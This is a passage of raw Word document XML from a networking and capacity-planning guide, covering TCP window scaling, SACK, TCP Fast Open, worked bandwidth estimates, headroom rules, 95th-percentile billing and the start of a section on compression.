        <w:t>Original TCP window field: 16 bits = max 65,535 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE4303" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>With 100ms RTT: max throughput = 65535 × 8 / 0.1 = 5.2 Mbps (pathetic for modern links).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DBF35" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Window scaling: multiplies the window field by 2^n (n up to 14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED0410" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Max window: 65535 × 2^14 = 1,073,725,440 bytes ≈ 1 GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC188F1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Enables full bandwidth utilization on any practical link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF690E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Selective Acknowledgment (SACK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E2051" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Without SACK: if packets 1,2,3,5,6,7 are received (4 is lost), sender must retransmit 4,5,6,7 (all from the gap onward).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AA25C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>With SACK: receiver tells sender exactly which packets were received. Sender retransmits only packet 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B038294" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Saves bandwidth (no unnecessary retransmission).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B55BD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Fast Open (TFO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890BBCA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Include data in the SYN packet (first packet of the connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381242D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server processes data immediately without waiting for the third handshake packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55AC7C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Saves 1 RTT for the first request on a new connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC6FE98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Combined with TLS 1.3 0-RTT: data flows with zero additional RTT on reconnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621D620" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="05ED0EC2">
          <v:rect id="_x0000_i4374" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B205958" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Bandwidth Estimation and Capacity Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23108F5D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Estimating Service Bandwidth Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58A924" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5DB96C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F3AED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Required Bandwidth = Request Rate × Average Message Size × Direction Factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA47601" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — E-commerce API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FF163" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC2174" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Peak requests/sec: 50,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC4BB6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average request size: 1 KB (small JSON payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48816699" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average response size: 5 KB (product data, recommendations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2749E17D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="585C2D15" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Inbound: 50,000 × 1 KB = 50 MB/s = 400 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A7311" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Outbound: 50,000 × 5 KB = 250 MB/s = 2 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D375B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total: 2.4 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17217248" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>A single 10 Gbps NIC handles this easily. But with overhead (retransmissions, TCP headers, TLS), plan for ~3.5 Gbps actual utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929EDEC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — Video Streaming Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589978A9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6C40A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Concurrent streams: 100,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B628B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average bitrate: 5 Mbps (1080p adaptive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665016BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="2984F288" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Outbound: 100,000 × 5 Mbps = 500 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5902C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="2DCC6F0D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Per server (serving 1000 streams): 5 Gbps → needs 10 Gbps NIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD08C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Servers needed: 100 (just for bandwidth alone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6D04C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — Database Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601E62D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E81BC5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Write volume: 10,000 writes/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E4316" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average write size: 500 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E079C3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>WAL overhead: 2x (log + data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABEE5B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="3AE3DB98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Replication bandwidth: 10,000 × 500 × 2 = 10 MB/s = 80 Mbps per replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C3B72" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>With 3 replicas: 240 Mbps from primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D316D77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Bandwidth Capacity Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C413B09" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The headroom rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8282B7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Never plan to use more than 70–80% of available bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD7408" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bursts can exceed average by 3–10x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B930AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP congestion control responds poorly when links are at 100% (massive packet loss, retransmissions, throughput collapse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D0131" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Need headroom for operational traffic (monitoring, deployments, backups).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F736BF2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Calculating burst bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A011722" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>If average is 2 Gbps but traffic is bursty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E11C56" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Measure the 95th percentile (typical billing metric for ISPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508F6CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Measure the peak-to-average ratio. Common values: 2–5x for web traffic, 10x for event-driven spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0A4A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Plan capacity for: average × burst_factor = 2 Gbps × 3 = 6 Gbps (need 10 Gbps link).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8C15A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Right-sizing for different tiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E861E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C005F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Edge (user-facing):     Plan for peak (must handle flash crowds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426FD52" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Core (service-to-service): Plan for sustained + 2x headroom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D13791" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cross-region replication:  Plan for steady-state + catch-up bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D640E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Backup/batch:            Can use off-peak capacity (scheduled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0457A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 The 95th Percentile Billing Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2C714" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How ISPs and cloud providers charge for bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC3364" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sample bandwidth utilization every 5 minutes (288 samples per day).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C572C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>At month-end, sort all samples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7916A4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Discard the top 5% (allows occasional spikes without penalty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56665B62" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bill based on the 95th percentile value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC9538" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56855E48" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557EE14C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Month: 30 days × 288 samples = 8,640 samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F960516" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>5% of samples = 432 samples (top 432 are discarded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E0D16" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Remaining: 8,208 samples → the highest of these is your billable rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258D4A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>You can burst for up to ~36 hours per month (5% of the time) without affecting your bill. This is why "burstable" bandwidth exists — short spikes are free.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E274A4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="725BCA91">
          <v:rect id="_x0000_i4375" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA181FD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bandwidth Optimization Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35047930" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Compression — Reducing Data Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9FBB6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The tradeoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> CPU time (for compression/decompression) vs. bandwidth (less data to transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A1D5B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When compression helps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB4F44A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth is expensive/limited (cross-region, mobile networks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C989F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Data is compressible (text, JSON, logs, HTML — typically 60–90% compression).</w:t>
